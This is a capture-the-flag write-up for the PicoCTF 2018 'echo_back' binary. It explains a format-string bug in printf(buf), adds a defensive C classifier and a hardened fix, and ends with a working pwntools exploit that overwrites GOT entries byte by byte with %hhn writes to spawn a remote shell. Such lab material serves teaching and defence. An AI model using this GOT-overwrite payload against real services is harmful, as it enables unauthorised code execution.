PicoCTF_2018_echo_back
Protection check

Source analysis
The function of interest is vuln:
```c
unsigned int vuln()
{
  char buf[128]; // [esp+Ch] [ebp-8Ch] BYREF
  unsigned int v2; // [esp+8Ch] [ebp-Ch]

  v2 = __readgsdword(0x14u);
  memset(buf, 0, sizeof(buf));
  system("echo input your message:");
  read(0, buf, 0x7Fu);
  printf(buf);
  puts("\n");
  puts("Thanks for sending the message!");
  return __readgsdword(0x14u) ^ v2;
}
```
`printf(buf)` passes user input as the format string, so there is a format string vulnerability.
Idea: the GOT is writable and the binary already contains a system function. First overwrite the printf GOT entry with system_plt; to get back into the function a second time, overwrite the puts GOT entry with the address of vuln. Then sending /bin/sh on the second input calls system("/bin/sh") and gives a shell.
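As an added example from the defensive side (not code from the original writeup; the function names are my own), the hardened form of vuln next to the vulnerable pattern, plus a small classifier that scans untrusted input the way printf would and tells read-only conversions apart from `%n`-family writes, which is what a log filter or a test for this bug class needs:

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Walk an untrusted string like printf would and report the worst
 * directive it contains:
 *   0 -> no conversion at all (plain text, "%%" is a literal percent)
 *   1 -> read-only conversions such as %x/%p/%s (stack/memory disclosure)
 *   2 -> an n conversion (%n, %hhn, %7$hhn ...): an arbitrary write,
 *        the primitive used against the GOT in this challenge. */
int classify_format(const char *s) {
    int worst = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;                    /* "%%" */
        while (isdigit((unsigned char)*p)) p++;     /* width or "7$" */
        if (*p == '$') p++;
        while (*p && strchr("-+ #0", *p)) p++;      /* flags */
        while (isdigit((unsigned char)*p) || *p == '*') p++;
        if (*p == '.') {                            /* precision */
            p++;
            while (isdigit((unsigned char)*p) || *p == '*') p++;
        }
        while (*p && strchr("hljztL", *p)) p++;     /* hh, h, l, ll ... */
        if (*p == '\0') break;                      /* dangling '%' */
        if (*p == 'n') return 2;
        if (strchr("diouxXeEfFgGaAcspC", *p)) worst = 1;
    }
    return worst;
}

/* The pattern from the challenge: user data is the format string. */
void echo_vulnerable(const char *buf) { printf(buf); }

/* Hardened form: user data is an argument, never the format, so a "%n"
 * in the input is only echoed back and nothing is written. Linking with
 * -Wl,-z,relro,-z,now (Full RELRO) additionally makes the GOT read-only
 * after loading, which removes the overwrite target even if another
 * format bug slips through. */
void echo_fixed(const char *buf) { printf("%s", buf); }
```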
exp
```python
from pwn import *

context(os='linux', arch='i386', log_level='debug')
#p = process("./buu")
p = remote('node4.buuoj.cn', 25113)

sh = b"sh\x00\x00"
num = u32(sh)  # not used by the final payload

printf_got = 0x804A010
system_plt = 0x8048460
puts_got = 0x804A01C
vuln = 0x80485AB

# The eight target addresses come first; they land at printf
# positional arguments 7..14 and are written one byte at a time.
payload = p32(printf_got)
payload += p32(printf_got + 1)
payload += p32(printf_got + 2)
payload += p32(printf_got + 3)
payload += p32(puts_got)
payload += p32(puts_got + 1)
payload += p32(puts_got + 2)
payload += p32(puts_got + 3)
# printf_got -> system_plt, byte by byte
payload += b"%64c%7$hhn"
payload += b"%36c%8$hhn"
payload += b"%128c%9$hhn"
payload += b"%4c%10$hhn"
# puts_got -> vuln, byte by byte, so the program loops back into vuln
payload += b"%163c%11$hhn"
payload += b"%218c%12$hhn"
payload += b"%127c%13$hhn"
payload += b"%4c%14$hhn"
p.sendline(payload)
p.recv()

# Second round: printf is now system, so the input is run as a command
payload = b"/bin/sh\x00"
p.sendline(payload)
p.interactive()
```
